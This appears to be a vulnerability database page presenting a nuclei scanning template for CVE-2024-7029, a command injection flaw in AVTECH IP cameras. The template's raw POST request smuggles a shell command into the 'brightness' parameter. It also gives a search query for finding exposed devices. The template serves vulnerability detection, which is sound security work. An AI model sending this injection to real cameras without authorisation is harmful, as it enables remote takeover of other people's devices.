Lucene search
K

AVTECH IP Camera - Command Injection

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 47 Views

AVTECH IP Camera Command Injection vulnerability with remote code execution via `/cgi-bin/supervisor/Factory.cgi` endpoint

Related
Refs
Code
id: CVE-2024-7029

info:
  name: AVTECH IP Camera - Command Injection
  author: DhiyaneshDK
  severity: high
  description: |
    The endpoint `/cgi-bin/supervisor/Factory.cgi` is vulnerable to command injection via the `action` parameter, allowing remote code execution.
  impact: |
    Authenticated attackers can execute arbitrary commands on the AVTECH IP camera system, achieving complete device compromise and potentially using it as a pivot point for network attacks.
  remediation: |
    Apply security patches from AVTECH or implement network segmentation and access controls to restrict access to the vulnerable endpoint.
  reference:
    - https://www.akamai.com/blog/security-research/2024-corona-mirai-botnet-infects-zero-day-sirt
    - https://www.cisa.gov/news-events/ics-advisories/icsa-24-214-07
    - https://github.com/fkie-cad/nvd-json-data-feeds
    - https://github.com/nomi-sec/PoC-in-GitHub
    - https://github.com/Ostorlab/KEV
    - https://github.com/bigherocenter/CVE-2024-7029-EXPLOIT/blob/main/CVE-2024-7029.py
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2024-7029
    cwe-id: CWE-77
    epss-score: 0.38998
    epss-percentile: 0.98411
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="AVTECH Software"
  tags: cve,cve2024,avtech,rce,intrusive,vkev,vuln

variables:
  string: "{{randstr}}"

http:
  - raw:
      - |
        POST /cgi-bin/supervisor/Factory.cgi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=white_led&brightness=$(echo%20{{string}}+2>&1)

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "{{string}}"

      - type: word
        negative: true
        part: body
        words:
          - "echo%20{{string}}"
          - "echo {{string}}"

      - type: word
        part: content_type
        words:
          - "text/plain"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100921802f0c53e67193d58a4b635003337c907aa0724993ff609a9d7da1cba72f1022100ed872c94565ff62bb05c5f2926a158ee4b0c8e1c6f2fd85da07efa2bb53a381c:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.6High risk
Vulners AI Score7.6
CVSS 3.18.8 - 9.8
CVSS 48.7
EPSS0.38998
SSVC
47